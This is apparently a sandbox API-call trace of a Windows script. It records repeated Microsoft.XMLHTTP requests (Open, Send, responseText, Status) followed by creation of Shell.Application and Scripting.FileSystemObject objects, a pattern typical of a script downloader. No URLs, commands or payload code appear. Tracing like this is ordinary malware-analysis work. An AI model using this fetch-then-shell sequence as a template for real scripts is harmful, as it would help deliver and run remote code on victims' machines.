	[0676.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.397] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c40, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c40, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.397] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.397] SysStringLen (param_1=0x0) returned 0x0
	[0676.397] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.397] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.398] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0676.398] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0676.398] ??2@YAPEAX_K@Z () returned 0x62f310
	[0676.398] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0676.398] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.398] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0676.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0676.398] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0676.398] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.398] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.401] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.401] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.401] SysStringLen (param_1=0x0) returned 0x0
	[0676.401] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.402] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0676.402] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0676.402] ??2@YAPEAX_K@Z () returned 0x62f330
	[0676.402] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.402] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0676.402] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.402] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.402] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.403] longjmp () 
	[0676.403] longjmp () 
	[0676.403] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.403] SysStringLen (param_1=0x0) returned 0x0
	[0676.403] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.403] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.403] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0676.404] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0676.404] ??2@YAPEAX_K@Z () returned 0x62f310
	[0676.404] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0676.404] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.404] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0676.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0676.404] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0676.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.404] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.404] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.405] longjmp () 
	[0676.405] longjmp () 
	[0676.405] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0676.405] SysStringLen (param_1=0x0) returned 0x0
	[0676.405] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0676.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0676.405] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0676.405] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0676.405] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0676.405] ??2@YAPEAX_K@Z () returned 0x62f330
	[0676.405] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0676.405] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0676.405] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0676.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0676.406] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0676.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.406] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0676.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0676.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0676.406] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0676.406] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0678.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0678.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0678.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0678.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0678.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0678.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0678.277] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0678.277] SysStringLen (param_1=0x0) returned 0x0
	[0678.277] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0678.278] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0678.278] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0678.278] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0678.278] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0678.278] ??2@YAPEAX_K@Z () returned 0x62f350
	[0678.278] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0678.278] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0678.278] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0678.278] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0678.278] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0678.278] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0678.278] SysStringLen (param_1=0x0) returned 0x0
	[0678.278] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0678.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0678.282] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0678.282] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0678.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0678.282] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0678.282] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
